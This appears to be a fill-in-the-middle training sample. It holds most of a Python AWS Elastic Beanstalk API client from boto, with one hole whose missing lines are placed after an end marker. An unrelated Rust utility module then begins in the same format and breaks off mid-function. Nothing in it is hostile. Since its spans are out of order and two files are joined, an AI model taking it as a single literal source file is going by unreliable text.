https_connection_factory, path,
security_token, profile_name=profile_name)
def _required_auth_capability(self):
return ['hmac-v4']
def _encode_bool(self, v):
v = bool(v)
return {True: "true", False: "false"}[v]
def _get_response(self, action, params, path='/', verb='GET'):
params['ContentType'] = 'JSON'
response = self.make_request(action, params, path, verb)
body = response.read()
boto.log.debug(body)
if response.status == 200:
return json.loads(body)
else:
raise self.ResponseError(response.status, response.reason, body)
def check_dns_availability(self, cname_prefix):
"""Checks if the specified CNAME is available.
:type cname_prefix: string
:param cname_prefix: The prefix used when this CNAME is
reserved.
"""
params = {'CNAMEPrefix': cname_prefix}
return self._get_response('CheckDNSAvailability', params)
def create_application(self, application_name, description=None):
"""
Creates an application that has one configuration template
named default and no application versions.
:type application_name: string
:param application_name: The name of the application.
Constraint: This name must be unique within your account. If the
specified name already exists, the action returns an
InvalidParameterValue error.
:type description: string
:param description: Describes the application.
:raises: TooManyApplicationsException
"""
params = {'ApplicationName': application_name}
if description:
params['Description'] = description
return self._get_response('CreateApplication', params)
def create_application_version(self, application_name, version_label,
description=None, s3_bucket=None,
s3_key=None, auto_create_application=None):
"""Creates an application version for the specified application.
:type application_name: string
:param application_name: The name of the application. If no
application is found with this name, and AutoCreateApplication is
false, returns an InvalidParameterValue error.
:type version_label: string
:param version_label: A label identifying this version. Constraint:
Must be unique per application. If an application version already
exists with this label for the specified application, AWS Elastic
Beanstalk returns an InvalidParameterValue error.
:type description: string
:param description: Describes this version.
:type s3_bucket: string
:param s3_bucket: The Amazon S3 bucket where the data is located.
:type s3_key: string
:param s3_key: The Amazon S3 key where the data is located. Both
s3_bucket and s3_key must be specified in order to use a specific
source bundle. If both of these values are not specified the
sample application will be used.
:type auto_create_application: boolean
:param auto_create_application: Determines how the system behaves if
the specified application for this version does not already exist:
true: Automatically creates the specified application for this
version if it does not already exist. false: Returns an
InvalidParameterValue if the specified application for this version
does not already exist. Default: false Valid Values: true | false
:raises: TooManyApplicationsException,
TooManyApplicationVersionsException,
InsufficientPrivilegesException,
S3LocationNotInServiceRegionException
"""
params = {'ApplicationName': application_name,
'VersionLabel': version_label}
if description:
params['Description'] = description
if s3_bucket and s3_key:
params['SourceBundle.S3Bucket'] = s3_bucket
params['SourceBundle.S3Key'] = s3_key
if auto_create_application:
params['AutoCreateApplication'] = self._encode_bool(
auto_create_application)
return self._get_response('CreateApplicationVersion', params)
def create_configuration_template(self, application_name, template_name,
solution_stack_name=None,
source_configuration_application_name=None,
source_configuration_template_name=None,
environment_id=None, description=None,
option_settings=None):
"""Creates a configuration template.
Templates are associated with a specific application and are used to
deploy different versions of the application with the same
configuration settings.
:type application_name: string
:param application_name: The name of the application to associate with
this configuration template. If no application is found with this
name, AWS Elastic Beanstalk returns an InvalidParameterValue error.
:type template_name: string
:param template_name: The name of the configuration template.
Constraint: This name must be unique per application. Default: If
a configuration template already exists with this name, AWS Elastic
Beanstalk returns an InvalidParameterValue error.
:type solution_stack_name: string
:param solution_stack_name: The name of the solution stack used by this
configuration. The solution stack specifies the operating system,
architecture, and application server for a configuration template.
It determines the set of configuration options as well as the
possible and default values. Use ListAvailableSolutionStacks to
obtain a list of available solution stacks. Default: If the
SolutionStackName is not specified and the source configuration
parameter is blank, AWS Elastic Beanstalk uses the default solution
stack. If not specified and the source configuration parameter is
specified, AWS Elastic Beanstalk uses the same solution stack as
the source configuration template.
:type source_configuration_application_name: string
:param source_configuration_application_name: The name of the
application associated with the configuration.
:type source_configuration_template_name: string
:param source_configuration_template_name: The name of the
configuration template.
:type environment_id: string
:param environment_id: The ID of the environment used with this
configuration template.
:type description: string
:param description: Describes this configuration.
:type option_settings: list
:param option_settings: If specified, AWS Elastic Beanstalk sets the
specified configuration option to the requested value. The new
value overrides the value obtained from the solution stack or the
source configuration template.
:raises: InsufficientPrivilegesException,
TooManyConfigurationTemplatesException
"""
params = {'ApplicationName': application_name,
'TemplateName': template_name}
if solution_stack_name:
params['SolutionStackName'] = solution_stack_name
if source_configuration_application_name:
params['SourceConfiguration.ApplicationName'] = source_configuration_application_name
if source_configuration_template_name:
params['SourceConfiguration.TemplateName'] = source_configuration_template_name
if environment_id:
params['EnvironmentId'] = environment_id
if description:
params['Description'] = description
if option_settings:
self._build_list_params(params, option_settings,
'OptionSettings.member',
('Namespace', 'OptionName', 'Value'))
return self._get_response('CreateConfigurationTemplate', params)
def create_environment(self, application_name, environment_name,
version_label=None, template_name=None,
solution_stack_name=None, cname_prefix=None,
description=None, option_settings=None,
options_to_remove=None, tier_name=None,
tier_type=None, tier_version='1.0'):
"""Launches an environment for the application using a configuration.
:type application_name: string
:param application_name: The name of the application that contains the
version to be deployed. If no application is found with this name,
CreateEnvironment returns an InvalidParameterValue error.
:type environment_name: string
:param environment_name: A unique name for the deployment environment.
Used in the application URL. Constraint: Must be from 4 to 23
characters in length. The name can contain only letters, numbers,
and hyphens. It cannot start or end with a hyphen. This name must
be unique in your account. If the specified name already exists,
AWS Elastic Beanstalk returns an InvalidParameterValue error.
Default: If the CNAME parameter is not specified, the environment
name becomes part of the CNAME, and therefore part of the visible
URL for your application.
:type version_label: string
:param version_label: The name of the application version to deploy. If
the specified application has no associated application versions,
AWS Elastic Beanstalk UpdateEnvironment returns an
InvalidParameterValue error. Default: If not specified, AWS
Elastic Beanstalk attempts to launch the most recently created
application version.
:type template_name: string
:param template_name: The name of the configuration template to
use in deployment. If no configuration template is found with this
name, AWS Elastic Beanstalk returns an InvalidParameterValue error.
Condition: You must specify either this parameter or a
SolutionStackName, but not both. If you specify both, AWS Elastic
Beanstalk returns an InvalidParameterCombination error. If you do
not specify either, AWS Elastic Beanstalk returns a
MissingRequiredParameter error.
:type solution_stack_name: string
:param solution_stack_name: This is an alternative to specifying a
configuration name. If specified, AWS Elastic Beanstalk sets the
configuration values to the default values associated with the
specified solution stack. Condition: You must specify either this
or a TemplateName, but not both. If you specify both, AWS Elastic
Beanstalk returns an InvalidParameterCombination error. If you do
not specify either, AWS Elastic Beanstalk returns a
MissingRequiredParameter error.
:type cname_prefix: string
:param cname_prefix: If specified, the environment attempts to use this
value as the prefix for the CNAME. If not specified, the
environment uses the environment name.
:type description: string
:param description: Describes this environment.
:type option_settings: list
:param option_settings: If specified, AWS Elastic Beanstalk sets the
specified configuration options to the requested value in the
configuration set for the new environment. These override the
values obtained from the solution stack or the configuration
template. Each element in the list is a tuple of (Namespace,
OptionName, Value), for example::
[('aws:autoscaling:launchconfiguration',
'Ec2KeyName', 'mykeypair')]
:type options_to_remove: list
:param options_to_remove: A list of custom user-defined configuration
options to remove from the configuration set for this new
environment.
:type tier_name: string
:param tier_name: The name of the tier. Valid values are
"WebServer" and "Worker". Defaults to "WebServer".
The ``tier_name`` and a ``tier_type`` parameters are
related and the values provided must be valid.
The possible combinations are:
* "WebServer" and "Standard" (the default)
* "Worker" and "SQS/HTTP"
:type tier_type: string
:param tier_type: The type of the tier. Valid values are
"Standard" if ``tier_name`` is "WebServer" and "SQS/HTTP"
if ``tier_name`` is "Worker". Defaults to "Standard".
:type tier_version: string
:type tier_version: The version of the tier. Valid values
currently are "1.0". Defaults to "1.0".
:raises: TooManyEnvironmentsException, InsufficientPrivilegesException
"""
params = {'ApplicationName': application_name,
'EnvironmentName': environment_name}
if version_label:
params['VersionLabel'] = version_label
if template_name:
params['TemplateName'] = template_name
if solution_stack_name:
params['SolutionStackName'] = solution_stack_name
if cname_prefix:
params['CNAMEPrefix'] = cname_prefix
if description:
params['Description'] = description
if option_settings:
self._build_list_params(params, option_settings,
'OptionSettings.member',
('Namespace', 'OptionName', 'Value'))
if options_to_remove:
self.build_list_params(params, options_to_remove,
'OptionsToRemove.member')
if tier_name and tier_type and tier_version:
params['Tier.Name'] = tier_name
params['Tier.Type'] = tier_type
params['Tier.Version'] = tier_version
return self._get_response('CreateEnvironment', params)
def create_storage_location(self):
"""
Creates the Amazon S3 storage location for the account. This
location is used to store user log files.
:raises: TooManyBucketsException,
S3SubscriptionRequiredException,
InsufficientPrivilegesException
"""
return self._get_response('CreateStorageLocation', params={})
def delete_application(self, application_name,
terminate_env_by_force=None):
"""
Deletes the specified application along with all associated
versions and configurations. The application versions will not
be deleted from your Amazon S3 bucket.
:type application_name: string
:param application_name: The name of the application to delete.
:type terminate_env_by_force: boolean
:param terminate_env_by_force: When set to true, running
environments will be terminated before deleting the application.
:raises: OperationInProgressException
"""
params = {'ApplicationName': application_name}
if terminate_env_by_force:
params['TerminateEnvByForce'] = self._encode_bool(
terminate_env_by_force)
return self._get_response('DeleteApplication', params)
def delete_application_version(self, application_name, version_label,
delete_source_bundle=None):
"""Deletes the specified version from the specified application.
:type application_name: string
:param application_name: The name of the application to delete
releases from.
:type version_label: string
:param version_label: The label of the version to delete.
:type delete_source_bundle: boolean
:param delete_source_bundle: Indicates whether to delete the
associated source bundle from Amazon S3. Valid Values: true |
false
:raises: SourceBundleDeletionException,
InsufficientPrivilegesException,
OperationInProgressException,
S3LocationNotInServiceRegionException
"""
params = {'ApplicationName': application_name,
'VersionLabel': version_label}
if delete_source_bundle:
params['DeleteSourceBundle'] = self._encode_bool(
delete_source_bundle)
return self._get_response('DeleteApplicationVersion', params)
def delete_configuration_template(self, application_name, template_name):
"""Deletes the specified configuration template.
:type application_name: string
:param application_name: The name of the application to delete
the configuration template from.
:type template_name: string
:param template_name: The name of the configuration template to
delete.
:raises: OperationInProgressException
"""
params = {'ApplicationName': application_name,
'TemplateName': template_name}
return self._get_response('DeleteConfigurationTemplate', params)
def delete_environment_configuration(self, application_name,
environment_name):
"""
Deletes the draft configuration associated with the running
environment. Updating a running environment with any
configuration changes creates a draft configuration set. You can
get the draft configuration using DescribeConfigurationSettings
while the update is in progress or if the update fails. The
DeploymentStatus for the draft configuration indicates whether
the deployment is in process or has failed. The draft
configuration remains in existence until it is deleted with this
action.
:type application_name: string
:param application_name: The name of the application the
environment is associated with.
:type environment_name: string
:param environment_name: The name of the environment to delete
the draft configuration from.
"""
params = {'ApplicationName': application_name,
'EnvironmentName': environment_name}
return self._get_response('DeleteEnvironmentConfiguration', params)
def describe_application_versions(self, application_name=None,
version_labels=None):
"""Returns descriptions for existing application versions.
:type application_name: string
:param application_name: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to only include ones that are associated
with the specified application.
:type version_labels: list
:param version_labels: If specified, restricts the returned
descriptions to only include ones that have the specified version
labels.
"""
params = {}
if application_name:
params['ApplicationName'] = application_name
if version_labels:
self.build_list_params(params, version_labels,
'VersionLabels.member')
return self._get_response('DescribeApplicationVersions', params)
def describe_applications(self, application_names=None):
"""Returns the descriptions of existing applications.
:type application_names: list
:param application_names: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to only include those with the specified
names.
"""
params = {}
if application_names:
self.build_list_params(params, application_names,
'ApplicationNames.member')
return self._get_response('DescribeApplications', params)
def describe_configuration_options(self, application_name=None,
template_name=None,
environment_name=None,
solution_stack_name=None, options=None):
"""Describes configuration options used in a template or environment.
Describes the configuration options that are used in a
particular configuration template or environment, or that a
specified solution stack defines. The description includes the
values the options, their default values, and an indication of
the required action on a running environment if an option value
is changed.
:type application_name: string
:param application_name: The name of the application associated with
the configuration template or environment. Only needed if you want
to describe the configuration options associated with either the
configuration template or environment.
:type template_name: string
:param template_name: The name of the configuration template whose
configuration options you want to describe.
:type environment_name: string
:param environment_name: The name of the environment whose
configuration options you want to describe.
:type solution_stack_name: string
:param solution_stack_name: The name of the solution stack whose
configuration options you want to describe.
:type options: list
:param options: If specified, restricts the descriptions to only
the specified options.
"""
params = {}
if application_name:
params['ApplicationName'] = application_name
if template_name:
params['TemplateName'] = template_name
if environment_name:
params['EnvironmentName'] = environment_name
if solution_stack_name:
params['SolutionStackName'] = solution_stack_name
if options:
self.build_list_params(params, options, 'Options.member')
return self._get_response('DescribeConfigurationOptions', params)
def describe_configuration_settings(self, application_name,
template_name=None,
environment_name=None):
"""
Returns a description of the settings for the specified
configuration set, that is, either a configuration template or
the configuration set associated with a running environment.
When describing the settings for the configuration set
associated with a running environment, it is possible to receive
two sets of setting descriptions. One is the deployed
configuration set, and the other is a draft configuration of an
environment that is either in the process of deployment or that
failed to deploy.
:type application_name: string
:param application_name: The application for the environment or
configuration template.
:type template_name: string
:param template_name: The name of the configuration template to
describe. Conditional: You must specify either this parameter or
an EnvironmentName, but not both. If you specify both, AWS Elastic
Beanstalk returns an InvalidParameterCombination error. If you do
not specify either, AWS Elastic Beanstalk returns a
MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to describe.
Condition: You must specify either this or a TemplateName, but not
both. If you specify both, AWS Elastic Beanstalk returns an
InvalidParameterCombination error. If you do not specify either,
AWS Elastic Beanstalk returns MissingRequiredParameter error.
"""
params = {'ApplicationName': application_name}
if template_name:
params['TemplateName'] = template_name
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('DescribeConfigurationSettings', params)
def describe_environment_resources(self, environment_id=None,
environment_name=None):
"""Returns AWS resources for this environment.
:type environment_id: string
:param environment_id: The ID of the environment to retrieve AWS
resource usage data. Condition: You must specify either this or an
EnvironmentName, or both. If you do not specify either, AWS Elastic
Beanstalk returns MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to retrieve
AWS resource usage data. Condition: You must specify either this
or an EnvironmentId, or both. If you do not specify either, AWS
Elastic Beanstalk returns MissingRequiredParameter error.
:raises: InsufficientPrivilegesException
"""
params = {}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('DescribeEnvironmentResources', params)
def describe_environments(self, application_name=None, version_label=None,
environment_ids=None, environment_names=None,
include_deleted=None,
included_deleted_back_to=None):
"""Returns descriptions for existing environments.
:type application_name: string
:param application_name: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to include only those that are associated
with this application.
:type version_label: string
:param version_label: If specified, AWS Elastic Beanstalk restricts the
returned descriptions to include only those that are associated
with this application version.
:type environment_ids: list
:param environment_ids: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to include only those that have the
specified IDs.
:type environment_names: list
:param environment_names: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to include only those that have the
specified names.
:type include_deleted: boolean
:param include_deleted: Indicates whether to include deleted
environments: true: Environments that have been deleted after
IncludedDeletedBackTo are displayed. false: Do not include deleted
environments.
:type included_deleted_back_to: timestamp
:param included_deleted_back_to: If specified when IncludeDeleted is
set to true, then environments deleted after this date are
displayed.
"""
params = {}
if application_name:
params['ApplicationName'] = application_name
if version_label:
params['VersionLabel'] = version_label
if environment_ids:
self.build_list_params(params, environment_ids,
'EnvironmentIds.member')
if environment_names:
self.build_list_params(params, environment_names,
'EnvironmentNames.member')
if include_deleted:
params['IncludeDeleted'] = self._encode_bool(include_deleted)
if included_deleted_back_to:
params['IncludedDeletedBackTo'] = included_deleted_back_to
return self._get_response('DescribeEnvironments', params)
def describe_events(self, application_name=None, version_label=None,
template_name=None, environment_id=None,
environment_name=None, request_id=None, severity=None,
start_time=None, end_time=None, max_records=None,
next_token=None):
"""Returns event descriptions matching criteria up to the last 6 weeks.
:type application_name: string
:param application_name: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to include only those associated with
this application.
:type version_label: string
:param version_label: If specified, AWS Elastic Beanstalk restricts the
returned descriptions to those associated with this application
version.
:type template_name: string
:param template_name: If specified, AWS Elastic Beanstalk restricts the
returned descriptions to those that are associated with this
environment configuration.
:type environment_id: string
:param environment_id: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to those associated with this
environment.
:type environment_name: string
:param environment_name: If specified, AWS Elastic Beanstalk restricts
the returned descriptions to those associated with this
environment.
:type request_id: string
:param request_id: If specified, AWS Elastic Beanstalk restricts the
described events to include only those associated with this request
ID.
:type severity: string
:param severity: If specified, limits the events returned from this
call to include only those with the specified severity or higher.
:type start_time: timestamp
:param start_time: If specified, AWS Elastic Beanstalk restricts the
returned descriptions to those that occur on or after this time.
:type end_time: timestamp
:param end_time: If specified, AWS Elastic Beanstalk restricts the
returned descriptions to those that occur up to, but not including,
the EndTime.
:type max_records: integer
:param max_records: Specifies the maximum number of events that can be
returned, beginning with the most recent event.
:type next_token: string
:param next_token: Pagination token. If specified, the events return
the next batch of results.
"""
params = {}
if application_name:
params['ApplicationName'] = application_name
if version_label:
params['VersionLabel'] = version_label
if template_name:
params['TemplateName'] = template_name
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
if request_id:
params['RequestId'] = request_id
if severity:
params['Severity'] = severity
if start_time:
params['StartTime'] = start_time
if end_time:
params['EndTime'] = end_time
if max_records:
params['MaxRecords'] = max_records
if next_token:
params['NextToken'] = next_token
return self._get_response('DescribeEvents', params)
def list_available_solution_stacks(self):
"""Returns a list of the available solution stack names."""
return self._get_response('ListAvailableSolutionStacks', params={})
def rebuild_environment(self, environment_id=None, environment_name=None):
"""
Deletes and recreates all of the AWS resources (for example:
the Auto Scaling group, load balancer, etc.) for a specified
environment and forces a restart.
:type environment_id: string
:param environment_id: The ID of the environment to rebuild.
Condition: You must specify either this or an EnvironmentName, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to rebuild.
Condition: You must specify either this or an EnvironmentId, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:raises: InsufficientPrivilegesException
"""
params = {}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('RebuildEnvironment', params)
def request_environment_info(self, info_type='tail', environment_id=None,
environment_name=None):
"""
Initiates a request to compile the specified type of
information of the deployed environment. Setting the InfoType
to tail compiles the last lines from the application server log
files of every Amazon EC2 instance in your environment. Use
RetrieveEnvironmentInfo to access the compiled information.
:type info_type: string
:param info_type: The type of information to request.
:type environment_id: string
:param environment_id: The ID of the environment of the
requested data. If no such environment is found,
RequestEnvironmentInfo returns an InvalidParameterValue error.
Condition: You must specify either this or an EnvironmentName, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment of the
requested data. If no such environment is found,
RequestEnvironmentInfo returns an InvalidParameterValue error.
Condition: You must specify either this or an EnvironmentId, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
"""
params = {'InfoType': info_type}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('RequestEnvironmentInfo', params)
def restart_app_server(self, environment_id=None, environment_name=None):
"""
Causes the environment to restart the application container
server running on each Amazon EC2 instance.
:type environment_id: string
:param environment_id: The ID of the environment to restart the server
for. Condition: You must specify either this or an
EnvironmentName, or both. If you do not specify either, AWS Elastic
Beanstalk returns MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to restart the
server for. Condition: You must specify either this or an
EnvironmentId, or both. If you do not specify either, AWS Elastic
Beanstalk returns MissingRequiredParameter error.
"""
params = {}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('RestartAppServer', params)
def retrieve_environment_info(self, info_type='tail', environment_id=None,
environment_name=None):
"""
Retrieves the compiled information from a RequestEnvironmentInfo
request.
:type info_type: string
:param info_type: The type of information to retrieve.
:type environment_id: string
:param environment_id: The ID of the data's environment. If no such
environment is found, returns an InvalidParameterValue error.
Condition: You must specify either this or an EnvironmentName, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the data's environment. If no such
environment is found, returns an InvalidParameterValue error.
Condition: You must specify either this or an EnvironmentId, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
"""
params = {'InfoType': info_type}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('RetrieveEnvironmentInfo', params)
def swap_environment_cnames(self, source_environment_id=None,
source_environment_name=None,
destination_environment_id=None,
destination_environment_name=None):
"""Swaps the CNAMEs of two environments.
:type source_environment_id: string
:param source_environment_id: The ID of the source environment.
Condition: You must specify at least the SourceEnvironmentID or the
SourceEnvironmentName. You may also specify both. If you specify
the SourceEnvironmentId, you must specify the
DestinationEnvironmentId.
:type source_environment_name: string
:param source_environment_name: The name of the source environment.
Condition: You must specify at least the SourceEnvironmentID or the
SourceEnvironmentName. You may also specify both. If you specify
the SourceEnvironmentName, you must specify the
DestinationEnvironmentName.
:type destination_environment_id: string
:param destination_environment_id: The ID of the destination
environment. Condition: You must specify at least the
DestinationEnvironmentID or the DestinationEnvironmentName. You may
also specify both. You must specify the SourceEnvironmentId with
the DestinationEnvironmentId.
:type destination_environment_name: string
:param destination_environment_name: The name of the destination
environment. Condition: You must specify at least the
DestinationEnvironmentID or the DestinationEnvironmentName. You may
also specify both. You must specify the SourceEnvironmentName with
the DestinationEnvironmentName.
"""
params = {}
if source_environment_id:
params['SourceEnvironmentId'] = source_environment_id
if source_environment_name:
params['SourceEnvironmentName'] = source_environment_name
if destination_environment_id:
params['DestinationEnvironmentId'] = destination_environment_id
if destination_environment_name:
params['DestinationEnvironmentName'] = destination_environment_name
return self._get_response('SwapEnvironmentCNAMEs', params)
def terminate_environment(self, environment_id=None, environment_name=None,
terminate_resources=None):
"""Terminates the specified environment.
:type environment_id: string
:param environment_id: The ID of the environment to terminate.
Condition: You must specify either this or an EnvironmentName, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to terminate.
Condition: You must specify either this or an EnvironmentId, or
both. If you do not specify either, AWS Elastic Beanstalk returns
MissingRequiredParameter error.
:type terminate_resources: boolean
:param terminate_resources: Indicates whether the associated AWS
resources should shut down when the environment is terminated:
true: (default) The user AWS resources (for example, the Auto
Scaling group, LoadBalancer, etc.) are terminated along with the
environment. false: The environment is removed from the AWS
Elastic Beanstalk but the AWS resources continue to operate. For
more information, see the AWS Elastic Beanstalk User Guide.
Default: true Valid Values: true | false
:raises: InsufficientPrivilegesException
"""
params = {}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
if terminate_resources:
params['TerminateResources'] = self._encode_bool(
terminate_resources)
return self._get_response('TerminateEnvironment', params)
def update_application(self, application_name, description=None):
"""
Updates the specified application to have the specified
properties.
:type application_name: string
:param application_name: The name of the application to update.
If no such application is found, UpdateApplication returns an
InvalidParameterValue error.
:type description: string
:param description: A new description for the application. Default: If
not specified, AWS Elastic Beanstalk does not update the
description.
"""
params = {'ApplicationName': application_name}
if description:
params['Description'] = description
return self._get_response('UpdateApplication', params)
def update_application_version(self, application_name, version_label,
description=None):
"""Updates the application version to have the properties.
:type application_name: string
:param application_name: The name of the application associated with
this version. If no application is found with this name,
UpdateApplication returns an InvalidParameterValue error.
:type version_label: string
:param version_label: The name of the version to update. If no
application version is found with this label, UpdateApplication
returns an InvalidParameterValue error.
:type description: string
:param description: A new description for this release.
"""
params = {'ApplicationName': application_name,
'VersionLabel': version_label}
if description:
params['Description'] = description
return self._get_response('UpdateApplicationVersion', params)
def update_configuration_template(self, application_name, template_name,
description=None, option_settings=None,
options_to_remove=None):
"""
Updates the specified configuration template to have the
specified properties or configuration option values.
:type application_name: string
:param application_name: The name of the application associated with
the configuration template to update. If no application is found
with this name, UpdateConfigurationTemplate returns an
InvalidParameterValue error.
:type template_name: string
:param template_name: The name of the configuration template to update.
If no configuration template is found with this name,
UpdateConfigurationTemplate returns an InvalidParameterValue error.
:type description: string
:param description: A new description for the configuration.
:type option_settings: list
:param option_settings: A list of configuration option settings to
update with the new specified option value.
:type options_to_remove: list
:param options_to_remove: A list of configuration options to remove
from the configuration set. Constraint: You can remove only
UserDefined configuration options.
:raises: InsufficientPrivilegesException
"""
params = {'ApplicationName': application_name,
'TemplateName': template_name}
if description:
params['Description'] = description
if option_settings:
self._build_list_params(params, option_settings,
'OptionSettings.member',
('Namespace', 'OptionName', 'Value'))
if options_to_remove:
self.build_list_params(params, options_to_remove,<|fim▁hole|> def update_environment(self, environment_id=None, environment_name=None,
version_label=None, template_name=None,
description=None, option_settings=None,
options_to_remove=None, tier_name=None,
tier_type=None, tier_version='1.0'):
"""
Updates the environment description, deploys a new application
version, updates the configuration settings to an entirely new
configuration template, or updates select configuration option
values in the running environment. Attempting to update both
the release and configuration is not allowed and AWS Elastic
Beanstalk returns an InvalidParameterCombination error. When
updating the configuration settings to a new template or
individual settings, a draft configuration is created and
DescribeConfigurationSettings for this environment returns two
setting descriptions with different DeploymentStatus values.
:type environment_id: string
:param environment_id: The ID of the environment to update. If no
environment with this ID exists, AWS Elastic Beanstalk returns an
InvalidParameterValue error. Condition: You must specify either
this or an EnvironmentName, or both. If you do not specify either,
AWS Elastic Beanstalk returns MissingRequiredParameter error.
:type environment_name: string
:param environment_name: The name of the environment to update. If no
environment with this name exists, AWS Elastic Beanstalk returns an
InvalidParameterValue error. Condition: You must specify either
this or an EnvironmentId, or both. If you do not specify either,
AWS Elastic Beanstalk returns MissingRequiredParameter error.
:type version_label: string
:param version_label: If this parameter is specified, AWS Elastic
Beanstalk deploys the named application version to the environment.
If no such application version is found, returns an
InvalidParameterValue error.
:type template_name: string
:param template_name: If this parameter is specified, AWS Elastic
Beanstalk deploys this configuration template to the environment.
If no such configuration template is found, AWS Elastic Beanstalk
returns an InvalidParameterValue error.
:type description: string
:param description: If this parameter is specified, AWS Elastic
Beanstalk updates the description of this environment.
:type option_settings: list
:param option_settings: If specified, AWS Elastic Beanstalk updates the
configuration set associated with the running environment and sets
the specified configuration options to the requested value.
:type options_to_remove: list
:param options_to_remove: A list of custom user-defined configuration
options to remove from the configuration set for this environment.
:type tier_name: string
:param tier_name: The name of the tier. Valid values are
"WebServer" and "Worker". Defaults to "WebServer".
The ``tier_name`` and a ``tier_type`` parameters are
related and the values provided must be valid.
The possible combinations are:
* "WebServer" and "Standard" (the default)
* "Worker" and "SQS/HTTP"
:type tier_type: string
:param tier_type: The type of the tier. Valid values are
"Standard" if ``tier_name`` is "WebServer" and "SQS/HTTP"
if ``tier_name`` is "Worker". Defaults to "Standard".
:type tier_version: string
:type tier_version: The version of the tier. Valid values
currently are "1.0". Defaults to "1.0".
:raises: InsufficientPrivilegesException
"""
params = {}
if environment_id:
params['EnvironmentId'] = environment_id
if environment_name:
params['EnvironmentName'] = environment_name
if version_label:
params['VersionLabel'] = version_label
if template_name:
params['TemplateName'] = template_name
if description:
params['Description'] = description
if option_settings:
self._build_list_params(params, option_settings,
'OptionSettings.member',
('Namespace', 'OptionName', 'Value'))
if options_to_remove:
self.build_list_params(params, options_to_remove,
'OptionsToRemove.member')
if tier_name and tier_type and tier_version:
params['Tier.Name'] = tier_name
params['Tier.Type'] = tier_type
params['Tier.Version'] = tier_version
return self._get_response('UpdateEnvironment', params)
def validate_configuration_settings(self, application_name,
option_settings, template_name=None,
environment_name=None):
"""
Takes a set of configuration settings and either a
configuration template or environment, and determines whether
those values are valid. This action returns a list of messages
indicating any errors or warnings associated with the selection
of option values.
:type application_name: string
:param application_name: The name of the application that the
configuration template or environment belongs to.
:type template_name: string
:param template_name: The name of the configuration template to
validate the settings against. Condition: You cannot specify both
this and an environment name.
:type environment_name: string
:param environment_name: The name of the environment to validate the
settings against. Condition: You cannot specify both this and a
configuration template name.
:type option_settings: list
:param option_settings: A list of the options and desired values to
evaluate.
:raises: InsufficientPrivilegesException
"""
params = {'ApplicationName': application_name}
self._build_list_params(params, option_settings,
'OptionSettings.member',
('Namespace', 'OptionName', 'Value'))
if template_name:
params['TemplateName'] = template_name
if environment_name:
params['EnvironmentName'] = environment_name
return self._get_response('ValidateConfigurationSettings', params)
def _build_list_params(self, params, user_values, prefix, tuple_names):
# For params such as the ConfigurationOptionSettings,
# they can specify a list of tuples where each tuple maps to a specific
# arg. For example:
# user_values = [('foo', 'bar', 'baz']
# prefix=MyOption.member
# tuple_names=('One', 'Two', 'Three')
# would result in:
# MyOption.member.1.One = foo
# MyOption.member.1.Two = bar
# MyOption.member.1.Three = baz
for i, user_value in enumerate(user_values, 1):
current_prefix = '%s.%s' % (prefix, i)
for key, value in zip(tuple_names, user_value):
full_key = '%s.%s' % (current_prefix, key)
params[full_key] = value<|fim▁end|>
|
'OptionsToRemove.member')
return self._get_response('UpdateConfigurationTemplate', params)
|
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>use std::collections::HashMap;
use std::error::Error;
use std::io::{self, Cursor};
use std::sync::Arc;
use rustc_serialize::{json, Encodable};
use rustc_serialize::json::Json;<|fim▁hole|>use conduit::{Request, Response, Handler};
use conduit_router::{RouteBuilder, RequestParams};
use db::RequestTransaction;
use self::errors::NotFound;
pub use self::errors::{CargoError, CargoResult, internal, human, internal_error};
pub use self::errors::{ChainError, std_error};
pub use self::hasher::{HashingReader};
pub use self::head::Head;
pub use self::io_util::LimitErrorReader;
pub use self::lazy_cell::LazyCell;
pub use self::request_proxy::RequestProxy;
pub mod errors;
mod hasher;
mod head;
mod io_util;
mod lazy_cell;
mod request_proxy;
pub trait RequestUtils {
fn redirect(&self, url: String) -> Response;
fn json<T: Encodable>(&self, t: &T) -> Response;
fn query(&self) -> HashMap<String, String>;
fn wants_json(&self) -> bool;
fn pagination(&self, default: usize, max: usize) -> CargoResult<(i64, i64)>;
}
pub fn json_response<T: Encodable>(t: &T) -> Response {
let s = json::encode(t).unwrap();
let json = fixup(s.parse().unwrap()).to_string();
let mut headers = HashMap::new();
headers.insert("Content-Type".to_string(),
vec!["application/json; charset=utf-8".to_string()]);
headers.insert("Content-Length".to_string(), vec![json.len().to_string()]);
return Response {
status: (200, "OK"),
headers: headers,
